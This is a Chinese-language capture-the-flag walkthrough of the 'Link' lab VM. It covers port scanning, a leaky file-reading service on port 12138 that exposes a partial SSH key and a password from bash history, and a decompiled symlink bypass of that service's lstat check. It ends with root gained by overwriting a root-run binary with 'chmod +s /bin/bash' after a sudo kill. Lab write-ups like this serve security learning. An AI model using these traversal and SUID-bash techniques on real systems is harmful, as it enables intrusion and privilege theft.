Link 测试

信息搜集

192.168.43.65

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
┌──(root㉿kali)-[/usr/share/seclists/Discovery/Web-Content]
└─# rustscan -a 192.168.43.65 -- -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
0day was here ♥

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.43.65:22
Open 192.168.43.65:80
Open 192.168.43.65:12138
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.43.65
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-22 03:00 EDT
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 03:00
Completed NSE at 03:00, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 03:00
Completed NSE at 03:00, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 03:00
Completed NSE at 03:00, 0.00s elapsed
Initiating ARP Ping Scan at 03:00
Scanning 192.168.43.65 [1 port]
Completed ARP Ping Scan at 03:00, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 03:00
Completed Parallel DNS resolution of 1 host. at 03:00, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 03:00
Scanning 192.168.43.65 [3 ports]
Discovered open port 22/tcp on 192.168.43.65
Discovered open port 80/tcp on 192.168.43.65
Discovered open port 12138/tcp on 192.168.43.65
Completed SYN Stealth Scan at 03:00, 0.03s elapsed (3 total ports)
Initiating Service scan at 03:00
Scanning 3 services on 192.168.43.65
Completed Service scan at 03:00, 6.14s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.43.65
NSE: Script scanning 192.168.43.65.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 03:00
Completed NSE at 03:00, 0.21s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 03:00
Completed NSE at 03:00, 0.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 03:00
Completed NSE at 03:00, 0.00s elapsed
Nmap scan report for 192.168.43.65
Host is up, received arp-response (0.00047s latency).
Scanned at 2026-04-22 03:00:48 EDT for 8s

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDRmicDuAIhDTuUUa37WCIEK2z2F1aDUtiJpok20zMzkbe1B41ZvvydX3JHjf7mgl0F/HRQlGHiA23Il+dwr0YbbBa2ggd5gDl95RSHhuUff/DIC10OFbP3YU8A4ItFb8pR6dN8jr+zU1SZvfx6FWApSkTJmeLPq9PN889+ibvckJcOMqrm1Y05FW2VCWn8QRvwivnuW7iU51IVz7arFe8JShXOLu0ANNqZEXyJyWjaK+MqyOK6ZtoWdyinEQFua81+tBZuvS+qb+AG15/h5hBsS/tUgVk5SieY6cCRvkYFHB099e1ggrigfnN4Kq2GvzRUYkegjkPzJFQ7BhPyxT/kDKrlVcLX54sXrp0poU5R9SqSnnESXVM4HQfjIIjTrJFufc2nBF+4f8dH3qtQ+jJkcPEKNVSKKEDULEk1BSBdokhh1GidxQY7ok+hEb9/wPmo6RBeb1d5t11SP8R5UHyI/yucRpS2M8hpBaovJv8pX1VwpOz3tUDJWCpkB3K8HDk=
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI2Hl4ZEYgnoDQflo03hI6346mXex6OPxHEjxDufHbkQZVosDPFwZttA8gloBLYLtvDVo9LZZwtv7F/EIiQoIHE=
| 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILRLvZKpSJkETalR4sqzJOh8a4ivZ8wGt1HfdV3OMNY1
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))
|_http-title: 12138
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.62 (Debian)
12138/tcp open unknown syn-ack ttl 64
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServer, TerminalServerCookie, X11Probe, afp, giop, ms-sql-s, oracle-tns:
|_ Please enter a path
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port12138-TCP:V=7.95%I=7%D=4/22%Time=69E87226%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,14,"Please\x20enter\x20a\x20path\n")%r(GetRequest,14,"Pleas
SF:e\x20enter\x20a\x20path\n")%r(HTTPOptions,14,"Please\x20enter\x20a\x20p
SF:ath\n")%r(RTSPRequest,14,"Please\x20enter\x20a\x20path\n")%r(RPCCheck,1
SF:4,"Please\x20enter\x20a\x20path\n")%r(DNSVersionBindReqTCP,14,"Please\x
SF:20enter\x20a\x20path\n")%r(DNSStatusRequestTCP,14,"Please\x20enter\x20a
SF:\x20path\n")%r(Help,14,"Please\x20enter\x20a\x20path\n")%r(SSLSessionRe
SF:q,14,"Please\x20enter\x20a\x20path\n")%r(TerminalServerCookie,14,"Pleas
SF:e\x20enter\x20a\x20path\n")%r(X11Probe,14,"Please\x20enter\x20a\x20path
SF:\n")%r(FourOhFourRequest,14,"Please\x20enter\x20a\x20path\n")%r(LPDStri
SF:ng,14,"Please\x20enter\x20a\x20path\n")%r(LDAPSearchReq,14,"Please\x20e
SF:nter\x20a\x20path\n")%r(LDAPBindReq,14,"Please\x20enter\x20a\x20path\n"
SF:)%r(LANDesk-RC,14,"Please\x20enter\x20a\x20path\n")%r(TerminalServer,14
SF:,"Please\x20enter\x20a\x20path\n")%r(NCP,14,"Please\x20enter\x20a\x20pa
SF:th\n")%r(NotesRPC,14,"Please\x20enter\x20a\x20path\n")%r(JavaRMI,14,"Pl
SF:ease\x20enter\x20a\x20path\n")%r(oracle-tns,14,"Please\x20enter\x20a\x2
SF:0path\n")%r(ms-sql-s,14,"Please\x20enter\x20a\x20path\n")%r(afp,14,"Ple
SF:ase\x20enter\x20a\x20path\n")%r(giop,14,"Please\x20enter\x20a\x20path\n
SF:");
MAC Address: 08:00:27:BB:0D:40 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=4/22%OT=22%CT=%CU=35199%PV=Y%DS=1%DC=D%G=N%M=080027%TM
OS:=69E87228%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)

Uptime guess: 8.860 days (since Mon Apr 13 06:21:51 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms 192.168.43.65

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 03:00
Completed NSE at 03:00, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 03:00
Completed NSE at 03:00, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 03:00
Completed NSE at 03:00, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.18 seconds
Raw packets sent: 26 (1.938KB) | Rcvd: 18 (1.410KB)

12138 端口运行着一个自定义的交互式脚本

这里使用nc连接发现可以读取/home/user12138目录下的文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root㉿kali)-[~]
└─# nc -nv 192.168.43.65 12138
Connection to 192.168.43.65 12138 port [tcp/*] succeeded!

Please enter a path
/etc/passwd

┌──(root㉿kali)-[~]
└─# nc -nv 192.168.43.65 12138
Connection to 192.168.43.65 12138 port [tcp/*] succeeded!
/etc/passwd
Must start with /home/user12138
Error a

┌──(root㉿kali)-[~]
└─# nc -nv 192.168.43.65 12138
Connection to 192.168.43.65 12138 port [tcp/*] succeeded!
/home/user12138/user.txt
flag{user-05851bbc17a30c08cebd70bb537a3115}

尝试读取SSH 密钥

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kali)-[~]
└─# nc -nv 192.168.43.65 12138
Connection to 192.168.43.65 12138 port [tcp/*] succeeded!
/home/user12138/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAwBD3BLHDihXwJck9NECr0+JK8QTr4L1mlDFK4vpg96jKRjAbsMiv
3FwkS24QwAwxF3L4BoGVb0dbMbLCYUvKyr24L8uhrw5pC9RqX54LEI8hORVoc0jlaGMa7s
7yhDR+JVufqRVt7TsVyvzhjaIBPp00Ze5hCXQvA6j2sxV6RR82Y8VCzBF96zKs+OoOEm3h
I9HGSV4P436hRigJGrSDBy76H/XiYDn/JfSpsP3AsGvZ6V0VSlEW4BMWPeZv+crk0mMU1Z
RGiA8E8Ci/uUjHcRptqIGHGAkTfcKHFYbV5FUkE+HTDno/+IcmYyUguxH/rfxDOorTSA/x
adHCaw1bI1c7PRRJCzHIqkx1vaDY4sZRmcIaVuXvYb1KjVXhg9sEAdg/zH3UjBgdRwXunc
JqdA4SBjUI+LooCKn10N/rPdaverr16wOvIk/wGuqh8to7zL3q69VPbkhoARw7damVsMrh
By7mmc0aFm2uW6XWoAVIVxUi+4CnChwQJEpLUZERAAAFiH+2m4N/tpuDAAAAB3NzaC1yc2
EAAAGBAMAQ9wSxw4oV8CXJPTRAq9PiSvEE6+C9ZpQxSuL6YPeoykYwG7DIr9xcJEtuEMAM
MRdy+AaBlW9HWzGywmFLysq9uC/Loa8OaQvUal+eCxCPITkVaHNI5WhjGu7O8oQ0fiVbn6
kVbe07Fcr84Y2iAT6dNGXuYQl0LwOo9rMVekUfNmPFQswRfesyrPjqDhJt4SPRxkleD+N+
oUYoCRq0gwcu+h/14mA5/yX0qbD9wLBr2eldFUpRFuATFj3mb/nK5NJjFNWURogPBPAov7
lIx3EabaiBhxgJE33ChxWG1eRVJBPh0w56P/iHJmMlILsR/638QzqK00gP8WnRwm

但是私钥不全。读取历史命令记录

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[/tmp/aaa]
└─# nc -nv 192.168.43.65 12138
Connection to 192.168.43.65 12138 port [tcp/*] succeeded!
/home/user12138/.bash_history
ls -al
mkdir .ssh
ssh-keygen -t rsa
ls -al
mysql -uroot -pfN10MaXtaEY5VJWJ65ni
exit
mysql -uwilliam -pfN10MaXtaEY5VJWJ65ni
exit
^C

尝试登录william发现可以登录上去

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[/tmp/aaa]
└─# ssh william@192.168.43.65
william@192.168.43.65's password:
Linux Link 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Apr 22 03:44:49 2026 from 192.168.43.61
william@Link:~$

提权

william -> root

在/目录下有一个12138.txt只能user12138读取

将/opt/12138 get下来ida分析

1
2
3
4
5
6
7
8
william@Link:/opt$ scp 12138 root@192.168.100.49:/tmp/aaa
The authenticity of host '192.168.100.49 (192.168.100.49)' can't be established.
ECDSA key fingerprint is SHA256:7VAtfvE+aW9glHngeHqv2b+33dbk/E0ztd64oxnS4as.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.100.49' (ECDSA) to the list of known hosts.
root@192.168.100.49's password:
12138 100% 17KB 3.2MB/s 00:00
william@Link:/opt$
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{
int optval; // [rsp+8h] [rbp-38h] BYREF
socklen_t addr_len; // [rsp+Ch] [rbp-34h] BYREF
struct sockaddr v5; // [rsp+10h] [rbp-30h] BYREF
struct sockaddr addr; // [rsp+20h] [rbp-20h] BYREF
int v7; // [rsp+38h] [rbp-8h]
int fd; // [rsp+3Ch] [rbp-4h]

addr_len = 16;
fd = socket(2, 1, 0);
if ( fd < 0 )
{
perror("Socket creation failed");
exit(1);
}
optval = 1;
if ( setsockopt(fd, 1, 2, &optval, 4u) < 0 )
{
perror("Setsockopt failed");
close(fd);
exit(1);
}
addr.sa_family = 2;
*(_DWORD *)&addr.sa_data[2] = inet_addr("0.0.0.0");
*(_WORD *)addr.sa_data = htons(0x2F6Au);
if ( bind(fd, &addr, 0x10u) < 0 )
{
perror("Bind failed");
close(fd);
exit(1);
}
if ( listen(fd, 5) < 0 )
{
perror("Listen failed");
close(fd);
exit(1);
}
while ( 1 )
{
v7 = accept(fd, &v5, &addr_len);
if ( v7 >= 0 )
handle_client((unsigned int)v7);
else
perror("Accept failed");
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
int __fastcall handle_client(int a1)
{
char v2[1024]; // [rsp+10h] [rbp-510h] BYREF
struct stat stat_buf; // [rsp+410h] [rbp-110h] BYREF
char buf[104]; // [rsp+4A0h] [rbp-80h] BYREF
int v5; // [rsp+508h] [rbp-18h]
int v6; // [rsp+50Ch] [rbp-14h]
char *v7; // [rsp+510h] [rbp-10h]
int v8; // [rsp+51Ch] [rbp-4h]

v8 = recv(a1, buf, 0x64uLL, 0);
if ( v8 <= 0 )
return close(a1);
buf[v8] = 0;
v7 = strchr(buf, 10);
if ( v7 )
*v7 = 0;
if ( buf[0] == 47 )
{
if ( strstr(buf, "..") )
{
send(a1, "Cannot use '..' in path\n", 0x18uLL, 0);
return close(a1);
}
else if ( !strncmp(buf, "/home/user12138", 0xFuLL) || !strncmp(buf, "/tmp", 4uLL) )
{
if ( (unsigned int)lstat(buf, &stat_buf) == -1 )
{
send(a1, "Error accessing path\n", 0x15uLL, 0);
return close(a1);
}
else if ( (stat_buf.st_mode & 0xF000) == 40960 )
{
send(a1, "Symbolic links are not allowed\n", 0x1FuLL, 0);
return close(a1);
}
else
{
v6 = open(buf, 0);
if ( v6 == -1 )
{
send(a1, "Failed to open file\n", 0x14uLL, 0);
return close(a1);
}
else
{
v5 = read(v6, v2, 0x3FFuLL);
close(v6);
if ( v5 <= 0 )
{
send(a1, "File is empty\n", 0xEuLL, 0);
}
else
{
v2[v5] = 0;
send(a1, v2, v5, 0);
}
return close(a1);
}
}
}
else
{
send(a1, "Must start with /home/user12138\n", 0x28uLL, 0);
return close(a1);
}
}
else
{
send(a1, "Please enter a path\n", 0x14uLL, 0);
return close(a1);
}
}handle_client

handle_client函数

  • 绝对路径校验​:路径必须以 /​ 开头 (buf[0] == 47)。
  • 防御目录穿越:路径中不能包含 ..​ (strstr(buf, ".."))。
  • 前缀白名单​:路径必须以 /home/user12138​ 或 /tmp 开头。
  • 符号链接校验:调用 lstat(buf, &stat_buf)​ 并检查 st_mode​,如果检测到是符号链接(S_IFLNK),则拒绝访问。
  • 读取操作:通过校验后,程序使用 open() 打开文件,读取前 1023 字节并回传。(这也是为什么前面无法完整读取ssh key的原因)

核心漏洞在于程序对符号链接的检查是不完整的,程序使用了 lstat 来检查用户提供的整个路径字符串:

1
2
if ( (unsigned int)lstat(buf, &stat_buf) == -1 ) // ...
else if ( (stat_buf.st_mode & 0xF000) == 40960 ) // 40960 是 S_IFLNK

lstat​ 函数仅返回路径中最后一个组件(Terminal Component)的信息。如果路径是 /tmp/folder/file.txt​,lstat​ 检查的是 file.txt​。如果 folder​ 是一个指向根目录的符号链接,lstat​ 并不会报错,因为它认为你最终访问的是一个普通文件。然而,当程序随后调用 open(buf, 0)​ 时,内核的路径解析器会递归地处理路径。如果中间目录是一个链接,内核会跟随它跳转到目标位置。

1
ln -snf / /tmp/pwn_link
1
2
3
william@Link:/opt$ nc 127.0.0.1 12138
/tmp/pwn_link/12138.txt
uYwwxAvT5DKrruaxvHA0

横向移动到user12138用户

user12138 -> root

1
2
3
4
5
william@Link:/tmp$ su user12138
Password:
user12138@Link:/tmp$ id
uid=1001(user12138) gid=1001(user12138) groups=1001(user12138)
user12138@Link:/tmp$

可以使用sudo提权

1
2
3
4
5
6
user12138@Link:/tmp$ sudo -l
Matching Defaults entries for user12138 on Link:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user12138 may run the following commands on Link:
(ALL) NOPASSWD: /usr/bin/kill

查看进程发现/opt/12138是root运行的

image

通过kill杀掉后发现又启动了。那么可以杀掉进程的时候修改/opt/12138从而提权

1
2
3
4
5
6
7
8
9
10
11
user12138@Link:/opt$ sudo /usr/bin/kill 408
user12138@Link:/opt$ vim 12138
user12138@Link:/opt$ cat 12138
chmod +s /bin/bash
user12138@Link:/opt$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
user12138@Link:/opt$ /bin/bas -p
bash: /bin/bas: No such file or directory
user12138@Link:/opt$ /bin/bash -p
bash-5.0# id
uid=1001(user12138) gid=1001(user12138) euid=0(root) egid=0(root) groups=0(root),1001(user12138)